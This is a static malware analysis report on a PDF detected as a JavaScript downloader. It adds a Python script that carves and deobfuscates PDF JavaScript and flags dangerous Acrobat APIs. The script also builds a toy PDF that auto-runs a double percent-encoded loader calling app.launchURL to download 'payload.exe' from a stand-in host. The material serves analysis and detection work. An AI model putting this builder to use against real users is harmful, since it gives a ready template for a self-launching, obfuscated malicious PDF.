Malicious PDF — malware analysis report

Static analysis result for SHA-256 bdcd959fd33a3c29…

Verdict: MALICIOUS
Type: PDF
Size: 45.0 KB
MD5: ab54a0f44b01538de8cfd57d2870c6ea
SHA-1: 4ab01dd6efd70fbe4ba360eded12f712dc7a9b07
SHA-256: bdcd959fd33a3c290d275e472d4d5cede59d702ab8787e48f51c5ca92fa3ce49
Risk score: 76

Malware Insights

MITRE ATT&CK
T1204.002 User Execution: Malicious File (PDF carrying malicious JavaScript)

The PDF contains embedded JavaScript: a /JavaScript action (PDF_JAVASCRIPT heuristic) that points at a /JS stream (PDF_JS heuristic). On its own, JavaScript in a PDF is a weak signal, since benign forms use it too, which is why both heuristics score low. What raises this sample is the combination of that JavaScript with the ClamAV signature match (Pdf.Exploit.Agent-36128) and the content of the carved streams: a 45 KB /JS object whose payload only becomes readable after two rounds of percent-decoding, yielding a 33 KB second stage. Benign form scripts have no reason to hide their code behind layered encoding; loaders that assemble a second stage at run time do, typically to download and execute further content for initial access or payload delivery. This is a static result, so the downloader behaviour is inferred from the structure of the script rather than observed in execution.

Heuristics (3)

  • ClamAV: Pdf.Exploit.Agent-36128 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Pdf.Exploit.Agent-36128
  • JavaScript action [low] PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream [low] PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

Extracted artifacts (2)

Files carved from inside the sample during analysis.

  • javascript_obj0008_000.js
    SHA-256: 575fd0ca504281545cf12d15deaa213ec96f2d23cfffe49fd99a2a6dc870f03f
    Kind: pdf-javascript-stream
    Source: PDF /JS object 8 at offset 0x1E7
    Size: 45305 bytes
  • legacy_pdfkit_stage_000.js
    SHA-256: 8e0b58686535c0569d1aabdc4e565fb48c3f06c5b5789d9e13351e52e0f9d863
    Kind: deobfuscated-js
    Source: double percent-decoded annotation JavaScript at offset 0x1E7
    Size: 33047 bytes
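To make concrete what the PDF_JAVASCRIPT / PDF_JS heuristics and the "double percent-decoded" artifact refer to, here is an added example of the carving and deobfuscation step. It is not the analysis platform's tooling and not code recovered from the sample: it parses a toy PDF that it constructs itself, finds the /JavaScript action, inflates the /JS stream it references, and peels the percent-encoding off the loader's string literal until the second stage is readable. The object number 8, the /OpenAction trigger, the FlateDecode filter, the eval(unescape(unescape(s))) loader and the example.invalid URL are assumptions modelled on the artifact table, not facts about the real file.

```python
"""Carve /JavaScript actions out of a PDF and peel percent-encoding layers.
Added example for this report, not the platform's tooling or the sample's code.
The PDF comes from build_sample_pdf(); object 8, the /OpenAction trigger, the
FlateDecode filter, the eval(unescape(unescape(s))) loader and the URL are
assumptions modelled on the artifact table, not recovered from the real file."""
import re
import zlib
from urllib.parse import unquote

# Acrobat JavaScript APIs and primitives worth flagging in a PDF script.
SUSPICIOUS_APIS = ("app.launchURL", "this.exportDataObject", "this.submitForm",
                   "util.printf", "eval(", "unescape(", "app.setTimeOut", "Collab.")

OBJ_RE = re.compile(rb"(\d+)\s+(\d+)\s+obj\b(.*?)\bendobj", re.S)
STREAM_START_RE = re.compile(rb"\bstream(\r\n|\n)")  # \b rules out "endstream"
LENGTH_RE = re.compile(rb"/Length\s+(\d+)")
JS_REF_RE = re.compile(rb"/JS\s+(\d+)\s+\d+\s+R")
STRING_RE = re.compile(r'"([^"\\]*(?:\\.[^"\\]*)*)"|\'([^\'\\]*(?:\\.[^\'\\]*)*)\'')


def parse_objects(pdf: bytes) -> dict:
    """Object number -> raw body. Naive on purpose: no xref walk, no object
    streams, no #xx name escapes (/J#53); real samples abuse all three."""
    return {int(m.group(1)): m.group(3) for m in OBJ_RE.finditer(pdf)}


def find_auto_triggers(objects: dict) -> list:
    """Objects that fire an action without a click (/OpenAction or /AA)."""
    return sorted(n for n, b in objects.items() if b"/OpenAction" in b or b"/AA" in b)


def find_js_streams(objects: dict) -> list:
    """Object numbers that /JavaScript actions reference through /JS n 0 R."""
    refs = set()
    for body in objects.values():
        if b"/JavaScript" in body:
            refs.update(int(r) for r in JS_REF_RE.findall(body))
    return sorted(refs)


def decode_stream(body: bytes) -> bytes:
    """Slice the stream payload out of an object body, inflating FlateDecode."""
    m = STREAM_START_RE.search(body)
    if not m:
        return b""
    start, length = m.end(), LENGTH_RE.search(body)
    if length:  # trust a direct /Length; an indirect one falls through to endstream
        data = body[start:start + int(length.group(1))]
    else:
        data = body[start:body.find(b"endstream", start)].rstrip(b"\r\n")
    return zlib.decompress(data) if b"/FlateDecode" in body else data


def percent_decode_rounds(text: str, max_rounds: int = 5):
    """Percent-decode until stable; returns (text, rounds). Two rounds undo the
    unescape(unescape(...)) layering behind a 'double percent-decoded' stage."""
    rounds = 0
    while rounds < max_rounds:
        nxt = unquote(text)
        if nxt == text:
            break
        text, rounds = nxt, rounds + 1
    return text, rounds


def deobfuscate_stage(js: str):
    """Peel the encoding off the longest string literal in the loader."""
    literals = [a or b for a, b in STRING_RE.findall(js)]
    return percent_decode_rounds(max(literals, key=len)) if literals else ("", 0)


def scan_apis(js: str) -> list:
    return [api for api in SUSPICIOUS_APIS if api in js]


def analyze_pdf(pdf: bytes) -> dict:
    objects = parse_objects(pdf)
    report = {"auto_triggers": find_auto_triggers(objects), "js_objects": [], "stages": []}
    for num in find_js_streams(objects):
        loader = decode_stream(objects[num]).decode("latin-1")
        stage, rounds = deobfuscate_stage(loader)
        report["js_objects"].append(num)
        report["stages"].append({"object": num, "loader_bytes": len(loader),
                                 "loader_apis": scan_apis(loader), "decode_rounds": rounds,
                                 "stage_apis": scan_apis(stage), "stage": stage})
    return report


def percent_encode_all(text: str) -> str:
    """Encode every byte as %XX, the form escape()-style obfuscators emit."""
    return "".join("%%%02X" % b for b in text.encode())


def build_sample_pdf() -> bytes:
    """Constructed toy PDF (not the analysed sample): /OpenAction -> /JavaScript
    action -> FlateDecode /JS stream carrying a double percent-encoded stage."""
    stage = 'app.launchURL("http://example.invalid/payload.exe", true);'
    loader = 'var s = "%s";\neval(unescape(unescape(s)));' % percent_encode_all(percent_encode_all(stage))
    stream = zlib.compress(loader.encode())
    return b"".join([
        b"%PDF-1.7\n",
        b"1 0 obj\n<< /Type /Catalog /Pages 2 0 R /OpenAction 7 0 R >>\nendobj\n",
        b"2 0 obj\n<< /Type /Pages /Kids [3 0 R] /Count 1 >>\nendobj\n",
        b"3 0 obj\n<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >>\nendobj\n",
        b"7 0 obj\n<< /S /JavaScript /JS 8 0 R >>\nendobj\n",
        b"8 0 obj\n<< /Length " + str(len(stream)).encode() + b" /Filter /FlateDecode >>\nstream\n",
        stream, b"\nendstream\nendobj\n", b"trailer\n<< /Root 1 0 R >>\n%%EOF\n"])


if __name__ == "__main__":
    import json
    print(json.dumps(analyze_pdf(build_sample_pdf()), indent=2))
```

Running the script prints a report in which the loader itself only shows eval( and unescape( while the peeled stage shows app.launchURL, which is the difference between the two carved artifacts above: the raw /JS object is what the PDF_JS heuristic sees, and the decoded stage is what the dangerous-API rules are meant to score. The parser is intentionally minimal; in practice samples hide /JavaScript and /JS behind #xx name escapes, object streams and indirect /Length values, so a full-featured tool such as pdf-parser.py or peepdf should do the carving, with this decoding loop applied to its output.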